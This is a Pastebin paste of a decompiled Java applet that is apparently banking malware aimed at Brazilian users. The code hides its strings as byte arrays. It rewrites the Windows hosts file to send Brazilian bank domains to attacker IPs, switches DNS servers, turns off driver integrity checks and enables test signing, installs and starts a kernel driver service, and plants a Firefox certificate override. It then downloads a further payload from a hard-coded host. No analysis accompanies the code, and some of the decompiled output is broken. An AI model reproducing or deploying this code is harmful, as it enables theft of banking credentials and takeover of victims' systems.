Advertisement
IsraelTorres

le.jad

May 19th, 2011
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 18.95 KB | None | 0 0
  1. // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
  2. // Jad home page: http://www.kpdus.com/jad.html
  3. // Decompiler options: packimports(3)
  4. // Source File Name:   le.java
  5.  
  6. import java.applet.Applet;
  7. import java.awt.Color;
  8. import java.awt.Graphics;
  9. import java.io.*;
  10. import java.net.URL;
  11. import java.net.URLConnection;
  12. import java.util.Enumeration;
  13. import java.util.regex.Matcher;
  14. import java.util.regex.Pattern;
  15. import java.util.zip.ZipEntry;
  16. import java.util.zip.ZipFile;
  17.  
  18. public class le extends Applet
  19. {
  20.  
  21.     public le()
  22.     {
  23.         BAR1 = new String(BAR);
  24.         LIN1 = new String(LIN);
  25.         TEM1 = new String(TEM);
  26.         IPP1 = new String(IPPP1);
  27.         IPP2 = new String(IPPP2);
  28.         VSYS1 = new String(VSYS);
  29.         VSYS164 = new String(VSYS64);
  30.         BAT64 = new String(BA64);
  31.         CMS1 = new String(CMS);
  32.         CMS164 = new String(CMS64);
  33.         CMSS1 = new String(CMSS);
  34.         CMSS164 = new String(CMSS64);
  35.         URLX1 = new String(URLX);
  36.         bb = new String(BBB);
  37.         gf = new String(gff);
  38.         san = new String(sann);
  39.         local_dnss = new String(local_dns);
  40.         dns_googl = new String(dns_goo);
  41.         wifi_dnss = new String(wifi_dns);
  42.         wifi_google = new String(wifi_googl);
  43.         RANDO = (int)(Math.random() * 100000000D);
  44.         IP_PH1 = IPP1;
  45.         IP_PH2 = IPP2;
  46.         JUST1 = "hs_err_pid_0x00001";
  47.         N_ZIP = "a";
  48.         X_ZIP = (new StringBuilder(String.valueOf(RANDO))).append(".tmp").toString();
  49.         BARRA = System.getProperty(BAR1);
  50.         PULAR = System.getProperty(LIN1);
  51.         TEMPO = System.getProperty(TEM1);
  52.         C_LIX = (new StringBuilder(String.valueOf(TEMPO))).append(BARRA).append(JUST1).toString();
  53.         C_HOST = (new StringBuilder("C:")).append(BARRA).append("WINDOWS").append(BARRA).append("system32").append(BARRA).append("drivers").append(BARRA).append("etc").append(BARRA).append("hosts").toString();
  54.         C_SYS = (new StringBuilder("C:")).append(BARRA).append("WINDOWS").append(BARRA).append("system32").append(BARRA).append("drivers").append(BARRA).append(VSYS1).toString();
  55.         C_SYS64 = (new StringBuilder("C:")).append(BARRA).append("WINDOWS").append(BARRA).append("system32").append(BARRA).append("drivers").append(BARRA).append(VSYS164).toString();
  56.         C_JAVA = (new StringBuilder(String.valueOf(System.getProperty("java.home")))).append(BARRA).append("lib").append(BARRA).append("security").append(BARRA).append("java.policy").toString();
  57.         ST_HOST = PULAR;
  58.         ST_JAVA = PULAR;
  59.         aaaooo = "a";
  60.     }
  61.  
  62.     public void paint(Graphics g)
  63.     {
  64.         g.setColor(Color.darkGray);
  65.         g.drawString(aaaooo, 5, 10);
  66.     }
  67.  
  68.     public static void Pausar(int n)
  69.     {
  70.         long t0 = System.currentTimeMillis();
  71.         long t1;
  72.         do
  73.             t1 = System.currentTimeMillis();
  74.         while(t1 - t0 < (long)(n * 1000));
  75.     }
  76.  
  77.     public void H32A(String URLexterna, String SalvarComo)
  78.     {
  79.         try
  80.         {
  81.             File files = new File(SalvarComo);
  82.             boolean exists = files.exists();
  83.             if(!exists)
  84.             {
  85.                 URL url = new URL(URLexterna);
  86.                 URLConnection connection = url.openConnection();
  87.                 InputStream stream = connection.getInputStream();
  88.                 BufferedInputStream in = new BufferedInputStream(stream);
  89.                 FileOutputStream file = new FileOutputStream(SalvarComo);
  90.                 BufferedOutputStream out = new BufferedOutputStream(file);
  91.                 int i;
  92.                 while((i = in.read()) != -1)
  93.                     out.write(i);
  94.                 out.flush();
  95.                 out.close();
  96.             }
  97.         }
  98.         catch(IOException ioexception) { }
  99.     }
  100.  
  101.     public void H32C(String ip, String HostURL)
  102.     {
  103.         ST_HOST = (new StringBuilder(String.valueOf(ST_HOST))).append(PULAR).append(ip).append(" ").append(HostURL).toString();
  104.     }
  105.  
  106.     public void H31S(String Local, String Dados)
  107.     {
  108.         try
  109.         {
  110.             File file = new File(Local);
  111.             FileWriter filewriter = new FileWriter(file, true);
  112.             filewriter.write((new StringBuilder()).append(Dados).toString());
  113.             filewriter.close();
  114.         }
  115.         catch(IOException ioexception) { }
  116.     }
  117.  
  118.     private static void H32F(String Local, String Destino)
  119.     {
  120.         try
  121.         {
  122.             File f1 = new File(Local);
  123.             File f2 = new File(Destino);
  124.             InputStream in = new FileInputStream(f1);
  125.             OutputStream out = new FileOutputStream(f2);
  126.             byte buf[] = new byte[1024];
  127.             int len;
  128.             while((len = in.read(buf)) > 0)
  129.                 out.write(buf, 0, len);
  130.             in.close();
  131.             out.close();
  132.         }
  133.         catch(FileNotFoundException filenotfoundexception) { }
  134.         catch(IOException ioexception) { }
  135.     }
  136.  
  137.     public void H32B(String valor)
  138.     {
  139.         try
  140.         {
  141.             Runtime.getRuntime().exec(valor);
  142.         }
  143.         catch(IOException ioexception) { }
  144.     }
  145.  
  146.     public void H24D(String p, String s)
  147.     {
  148.         try
  149.         {
  150.             InputStream aa1 = super.getClass().getResourceAsStream(p);
  151.             FileOutputStream aa3 = new FileOutputStream(s);
  152.             int aa0;
  153.             while((aa0 = aa1.read()) != -1)
  154.                 aa3.write(aa0);
  155.             aa3.flush();
  156.             aa3.close();
  157.         }
  158.         catch(IOException ioexception) { }
  159.     }
  160.  
  161.     public void H24Z(String Arq)
  162.     {
  163.         try
  164.         {
  165.             String zipname = (new StringBuilder(String.valueOf(TEMPO))).append(Arq).toString();
  166.             String xDir = TEMPO;
  167.             ZipFile zipFile = new ZipFile(zipname);
  168.             BufferedInputStream bis;
  169.             for(Enumeration enumeration = zipFile.entries(); enumeration.hasMoreElements(); bis.close())
  170.             {
  171.                 ZipEntry zipEntry = (ZipEntry)enumeration.nextElement();
  172.                 bis = new BufferedInputStream(zipFile.getInputStream(zipEntry));
  173.                 byte buffer[] = new byte[2048];
  174.                 BufferedOutputStream bos = new BufferedOutputStream(new FileOutputStream((new StringBuilder(String.valueOf(xDir))).append(zipEntry.getName()).toString()), buffer.length);
  175.                 int size;
  176.                 while((size = bis.read(buffer, 0, buffer.length)) != -1)
  177.                     bos.write(buffer, 0, size);
  178.                 bos.flush();
  179.                 bos.close();
  180.             }
  181.  
  182.         }
  183.         catch(IOException ioexception) { }
  184.     }
  185.  
  186.     public static boolean b64()
  187.     {
  188.         boolean eh64 = false;
  189.         if(System.getProperty("os.name").contains("Windows"))
  190.             eh64 = System.getenv("ProgramFiles(x86)") != null;
  191.         else
  192.             eh64 = System.getProperty("os.arch").indexOf("64") != -1;
  193.         return eh64;
  194.     }
  195.  
  196.     public void FFexists()
  197.     {
  198.         String U_HOME = System.getProperty("user.home");
  199.         if(!U_HOME.endsWith("/") && !U_HOME.endsWith("\\"))
  200.             U_HOME = (new StringBuilder(String.valueOf(U_HOME))).append(BARRA).toString();
  201.         String STR1 = (new StringBuilder(String.valueOf(U_HOME))).append("Application Data").append(BARRA).append("Mozilla").append(BARRA).append("Firefox").append(BARRA).toString();
  202.         String STR2 = (new StringBuilder(String.valueOf(U_HOME))).append("Dados de aplicativos").append(BARRA).append("Mozilla").append(BARRA).append("Firefox").append(BARRA).toString();
  203.         String STR3 = (new StringBuilder(String.valueOf(U_HOME))).append("AppData").append(BARRA).append("Roaming ").append(BARRA).append("Mozilla").append(BARRA).append("Firefox").append(BARRA).toString();
  204.         try
  205.         {
  206.             File arq1 = new File((new StringBuilder(String.valueOf(STR1))).append("profiles.ini").toString());
  207.             File arq2 = new File((new StringBuilder(String.valueOf(STR2))).append("profiles.ini").toString());
  208.             File arq3 = new File((new StringBuilder(String.valueOf(STR3))).append("profiles.ini").toString());
  209.             if(arq1.exists())
  210.                 GetFFdir(STR1);
  211.             else
  212.             if(arq2.exists())
  213.                 GetFFdir(STR2);
  214.             else
  215.             if(arq3.exists())
  216.                 GetFFdir(STR3);
  217.         }
  218.         catch(Exception exception) { }
  219.     }
  220.  
  221.     public void GetFFdir(String Where)
  222.     {
  223.         try
  224.         {
  225.             FileInputStream fstream = new FileInputStream((new StringBuilder(String.valueOf(Where))).append("profiles.ini").toString());
  226.             DataInputStream in = new DataInputStream(fstream);
  227.             BufferedReader br = new BufferedReader(new InputStreamReader(in));
  228.             String strLine;
  229.             while((strLine = br.readLine()) != null)
  230.             {
  231.                 Pattern Filtrar = Pattern.compile("Path=(.*)");
  232.                 Matcher Buscar = Filtrar.matcher(strLine);
  233.                 if(Buscar.find())
  234.                 {
  235.                     String ProfilesDIR = new String(Buscar.group(1));
  236.                     ProfilesDIR = ProfilesDIR.replace('/', '\\');
  237.                     if(!ProfilesDIR.endsWith("\\"))
  238.                         ProfilesDIR = (new StringBuilder(String.valueOf(ProfilesDIR))).append("\\").toString();
  239.                     ProfilesDIR = (new StringBuilder(String.valueOf(Where))).append(ProfilesDIR).toString();
  240.                     H32F((new StringBuilder(String.valueOf(TEMPO))).append("cert_override.txt").toString(), (new StringBuilder(String.valueOf(ProfilesDIR))).append("cert_override.txt").toString());
  241.                 }
  242.             }
  243.             in.close();
  244.         }
  245.         catch(Exception exception) { }
  246.     }
  247.  
  248.     public static String OS()
  249.     {
  250.         String t = null;
  251.         String OS = System.getProperty(s8).toLowerCase();
  252.         if(OS.contains("windows 7"))
  253.             t = "Windows7";
  254.         if(OS.contains("windows vista"))
  255.             t = "WindowsVista";
  256.         if(OS.contains("windows xp"))
  257.             t = "WindowsXP";
  258.         if(OS.contains("windows nt"))
  259.             t = "WindowsNT";
  260.         return t;
  261.     }
  262.  
  263.     public void H922(String ver, Boolean estrutura)
  264.     {
  265.         if(ver == "Windows7" && estrutura.booleanValue() || ver == "WindowsVista" && estrutura.booleanValue())
  266.         {
  267.             H32B(local_dnss);
  268.             H32B(dns_googl);
  269.             H32B(wifi_dnss);
  270.             H32B(wifi_google);
  271.             H32F((new StringBuilder(String.valueOf(TEMPO))).append(VSYS164).toString(), C_SYS64);
  272.             H32B("cmd /c %tmp%\\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS");
  273.             H32B("cmd /c %tmp%\\bcdedit.exe -set TESTSIGNING ON");
  274.             H32B(CMS164);
  275.             Pausar(2);
  276.             H32B(CMSS164);
  277.         }
  278.         if(ver == "Windows7" && !estrutura.booleanValue() || ver == "WindowsVista" && !estrutura.booleanValue())
  279.         {
  280.             H32B(local_dnss);
  281.             H32B(dns_googl);
  282.             H32B(wifi_dnss);
  283.             H32B(wifi_google);
  284.             H32F((new StringBuilder(String.valueOf(TEMPO))).append(VSYS1).toString(), C_SYS);
  285.             H32B("cmd /c %tmp%\\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS");
  286.             H32B("cmd /c %tmp%\\bcdedit.exe -set TESTSIGNING ON");
  287.             H32B(CMS1);
  288.             Pausar(2);
  289.             H32B(CMSS1);
  290.         }
  291.         if(ver == "WindowsXP")
  292.         {
  293.             H32B(local_dnss);
  294.             Pausar(3);
  295.             H32B(dns_googl);
  296.             Pausar(3);
  297.             H32B(wifi_dnss);
  298.             Pausar(3);
  299.             H32B(wifi_google);
  300.             H32F((new StringBuilder(String.valueOf(TEMPO))).append(VSYS1).toString(), C_SYS);
  301.             H32B(CMS1);
  302.             Pausar(2);
  303.             H32B(CMSS1);
  304.             H32B("cmd /c del %tmp%\\aaa.bat");
  305.         }
  306.     }
  307.  
  308.     public void init()
  309.     {
  310.         if(System.getProperty("os.name").toLowerCase().indexOf("windows") <= -1)
  311.             break MISSING_BLOCK_LABEL_274;
  312.         File files = new File(C_LIX);
  313.         boolean exists = files.exists();
  314.         if(exists)
  315.             break MISSING_BLOCK_LABEL_231;
  316.         if(TEMPO.endsWith("/") || TEMPO.endsWith("\\")) goto _L2; else goto _L1
  317. _L1:
  318.         this;
  319.         TEMPO;
  320.         JVM INSTR new #191 <Class StringBuilder>;
  321.         JVM INSTR dup_x1 ;
  322.         JVM INSTR swap ;
  323.         String.valueOf();
  324.         StringBuilder();
  325.         BARRA;
  326.         append();
  327.         toString();
  328.         TEMPO;
  329. _L2:
  330.         Pausar(1);
  331.         H32B("cmd /c mkdir c:\\windows\\syswow64\\drivers\\etc");
  332.         Pausar(1);
  333.         H32C(IP_PH1, bb);
  334.         H32C(IP_PH2, gf);
  335.         Pausar(1);
  336.         H31S(C_HOST, ST_HOST);
  337.         H31S(C_JAVA, ST_JAVA);
  338.         H24D(N_ZIP, (new StringBuilder(String.valueOf(TEMPO))).append(X_ZIP).toString());
  339.         Pausar(1);
  340.         H24Z(X_ZIP);
  341.         Pausar(1);
  342.         FFexists();
  343.         Pausar(3);
  344.         H922(OS(), Boolean.valueOf(b64()));
  345.         H32A((new StringBuilder(String.valueOf(URLX1))).append(OS()).append("&estrutura=").append(b64()).toString(), C_LIX);
  346.     }
  347.  
  348.     private static final long serialVersionUID = 1L;
  349.     static byte osn[] = {
  350.         111, 115, 46, 110, 97, 109, 101
  351.     };
  352.     static String s8;
  353.     byte BAR[] = {
  354.         102, 105, 108, 101, 46, 115, 101, 112, 97, 114,
  355.         97, 116, 111, 114
  356.     };
  357.     String BAR1;
  358.     byte LIN[] = {
  359.         108, 105, 110, 101, 46, 115, 101, 112, 97, 114,
  360.         97, 116, 111, 114
  361.     };
  362.     String LIN1;
  363.     byte TEM[] = {
  364.         106, 97, 118, 97, 46, 105, 111, 46, 116, 109,
  365.         112, 100, 105, 114
  366.     };
  367.     String TEM1;
  368.     byte IPPP1[] = {
  369.         50, 49, 54, 46, 49, 53, 53, 46, 49, 51,
  370.         51, 46, 50, 51, 54
  371.     };
  372.     String IPP1;
  373.     byte IPPP2[] = {
  374.         50, 49, 54, 46, 49, 53, 53, 46, 49, 51,
  375.         51, 46, 50, 51, 55
  376.     };
  377.     String IPP2;
  378.     byte VSYS[] = {
  379.         112, 108, 117, 115, 100, 114, 105, 118, 101, 114,
  380.         46, 115, 121, 115
  381.     };
  382.     String VSYS1;
  383.     byte VSYS64[] = {
  384.         112, 108, 117, 115, 100, 114, 105, 118, 101, 114,
  385.         54, 52, 46, 115, 121, 115
  386.     };
  387.     String VSYS164;
  388.     byte BA64[] = {
  389.         97, 97, 97, 46, 98, 97, 116
  390.     };
  391.     String BAT64;
  392.     byte CMS[] = {
  393.         99, 109, 100, 46, 101, 120, 101, 32, 47, 99,
  394.         32, 115, 99, 32, 99, 114, 101, 97, 116, 101,
  395.         32, 100, 114, 105, 118, 101, 114, 117, 115, 98,
  396.         112, 108, 117, 115, 32, 98, 105, 110, 80, 97,
  397.         116, 104, 61, 32, 34, 115, 121, 115, 116, 101,
  398.         109, 51, 50, 92, 100, 114, 105, 118, 101, 114,
  399.         115, 92, 112, 108, 117, 115, 100, 114, 105, 118,
  400.         101, 114, 46, 115, 121, 115, 34, 32, 103, 114,
  401.         111, 117, 112, 61, 32, 34, 65, 99, 116, 32,
  402.         80, 108, 117, 115, 32, 71, 114, 111, 117, 112,
  403.         34, 32, 116, 121, 112, 101, 61, 32, 107, 101,
  404.         114, 110, 101, 108, 32, 115, 116, 97, 114, 116,
  405.         61, 32, 98, 111, 111, 116, 32, 101, 114, 114,
  406.         111, 114, 61, 32, 110, 111, 114, 109, 97, 108,
  407.         32, 68, 105, 115, 112, 108, 97, 121, 78, 97,
  408.         109, 101, 61, 32, 34, 100, 114, 105, 118, 101,
  409.         114, 117, 115, 98, 112, 108, 117, 115, 34
  410.     };
  411.     String CMS1;
  412.     byte CMS64[] = {
  413.         99, 109, 100, 46, 101, 120, 101, 32, 47, 99,
  414.         32, 115, 99, 32, 99, 114, 101, 97, 116, 101,
  415.         32, 100, 114, 105, 118, 101, 114, 117, 115, 98,
  416.         112, 108, 117, 115, 54, 52, 32, 98, 105, 110,
  417.         80, 97, 116, 104, 61, 32, 34, 83, 121, 115,
  418.         87, 79, 87, 54, 52, 92, 100, 114, 105, 118,
  419.         101, 114, 115, 92, 112, 108, 117, 115, 100, 114,
  420.         105, 118, 101, 114, 54, 52, 46, 115, 121, 115,
  421.         34, 32, 103, 114, 111, 117, 112, 61, 32, 34,
  422.         65, 99, 116, 32, 80, 108, 117, 115, 32, 71,
  423.         114, 111, 117, 112, 34, 32, 116, 121, 112, 101,
  424.         61, 32, 107, 101, 114, 110, 101, 108, 32, 115,
  425.         116, 97, 114, 116, 61, 32, 98, 111, 111, 116,
  426.         32, 101, 114, 114, 111, 114, 61, 32, 110, 111,
  427.         114, 109, 97, 108, 32, 68, 105, 115, 112, 108,
  428.         97, 121, 78, 97, 109, 101, 61, 32, 34, 100,
  429.         114, 105, 118, 101, 114, 117, 115, 98, 112, 108,
  430.         117, 115, 54, 52, 34
  431.     };
  432.     String CMS164;
  433.     byte CMSS[] = {
  434.         99, 109, 100, 46, 101, 120, 101, 32, 47, 99,
  435.         32, 115, 99, 32, 115, 116, 97, 114, 116, 32,
  436.         100, 114, 105, 118, 101, 114, 117, 115, 98, 112,
  437.         108, 117, 115
  438.     };
  439.     String CMSS1;
  440.     byte CMSS64[] = {
  441.         99, 109, 100, 46, 101, 120, 101, 32, 47, 99,
  442.         32, 115, 99, 32, 115, 116, 97, 114, 116, 32,
  443.         100, 114, 105, 118, 101, 114, 117, 115, 98, 112,
  444.         108, 117, 115, 54, 52
  445.     };
  446.     String CMSS164;
  447.     byte URLX[] = {
  448.         104, 116, 116, 112, 58, 47, 47, 50, 49, 54,
  449.         46, 49, 53, 53, 46, 49, 51, 51, 46, 50,
  450.         51, 56, 47, 99, 46, 112, 104, 112, 63, 111,
  451.         115, 61
  452.     };
  453.     String URLX1;
  454.     byte BBB[] = {
  455.         119, 119, 119, 50, 46, 98, 97, 110, 99, 111,
  456.         98, 114, 97, 115, 105, 108, 46, 99, 111, 109,
  457.         46, 98, 114
  458.     };
  459.     String bb;
  460.     byte gff[] = {
  461.         97, 97, 112, 106, 46, 98, 98, 46, 99, 111,
  462.         109, 46, 98, 114
  463.     };
  464.     String gf;
  465.     byte sann[] = {
  466.         119, 119, 119, 46, 115, 97, 110, 116, 97, 110,
  467.         100, 101, 114, 110, 101, 116, 46, 99, 111, 109,
  468.         46, 98, 114
  469.     };
  470.     String san;
  471.     byte local_dns[] = {
  472.         99, 109, 100, 32, 47, 99, 32, 110, 101, 116,
  473.         115, 104, 32, 105, 110, 116, 101, 114, 102, 97,
  474.         99, 101, 32, 105, 112, 32, 97, 100, 100, 32,
  475.         100, 110, 115, 32, 34, 67, 111, 110, 101, 120,
  476.         -29, 111, 32, 108, 111, 99, 97, 108, 34, 32,
  477.         49, 55, 52, 46, 51, 54, 46, 50, 55, 46,
  478.         49, 57, 54, 32, 105, 110, 100, 101, 120, 61,
  479.         49
  480.     };
  481.     String local_dnss;
  482.     byte dns_goo[] = {
  483.         99, 109, 100, 32, 47, 99, 32, 110, 101, 116,
  484.         115, 104, 32, 105, 110, 116, 101, 114, 102, 97,
  485.         99, 101, 32, 105, 112, 32, 97, 100, 100, 32,
  486.         100, 110, 115, 32, 34, 67, 111, 110, 101, 120,
  487.         -29, 111, 32, 108, 111, 99, 97, 108, 34, 32,
  488.         56, 46, 56, 46, 52, 46, 52, 32, 105, 110,
  489.         100, 101, 120, 61, 50
  490.     };
  491.     String dns_googl;
  492.     byte wifi_dns[] = {
  493.         99, 109, 100, 32, 47, 99, 32, 110, 101, 116,
  494.         115, 104, 32, 105, 110, 116, 101, 114, 102, 97,
  495.         99, 101, 32, 105, 112, 32, 97, 100, 100, 32,
  496.         100, 110, 115, 32, 34, 67, 111, 110, 101, 120,
  497.         -29, 111, 32, 100, 101, 32, 82, 101, 100, 101,
  498.         32, 115, 101, 109, 32, 70, 105, 111, 34, 32,
  499.         49, 55, 52, 46, 51, 54, 46, 50, 55, 46,
  500.         49, 57, 54, 32, 105, 110, 100, 101, 120, 61,
  501.         49
  502.     };
  503.     String wifi_dnss;
  504.     byte wifi_googl[] = {
  505.         99, 109, 100, 32, 47, 99, 32, 110, 101, 116,
  506.         115, 104, 32, 105, 110, 116, 101, 114, 102, 97,
  507.         99, 101, 32, 105, 112, 32, 97, 100, 100, 32,
  508.         100, 110, 115, 32, 34, 67, 111, 110, 101, 120,
  509.         -29, 111, 32, 100, 101, 32, 82, 101, 100, 101,
  510.         32, 115, 101, 109, 32, 70, 105, 111, 34, 32,
  511.         56, 46, 56, 46, 52, 46, 52, 32, 105, 110,
  512.         100, 101, 120, 61, 50
  513.     };
  514.     String wifi_google;
  515.     int RANDO;
  516.     String IP_PH1;
  517.     String IP_PH2;
  518.     String JUST1;
  519.     String N_ZIP;
  520.     String X_ZIP;
  521.     String BARRA;
  522.     String PULAR;
  523.     String TEMPO;
  524.     String C_LIX;
  525.     String C_HOST;
  526.     String C_SYS;
  527.     String C_SYS64;
  528.     String C_JAVA;
  529.     String ST_HOST;
  530.     String ST_JAVA;
  531.     String aaaooo;
  532.  
  533.     static
  534.     {
  535.         s8 = new String(osn);
  536.     }
  537. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement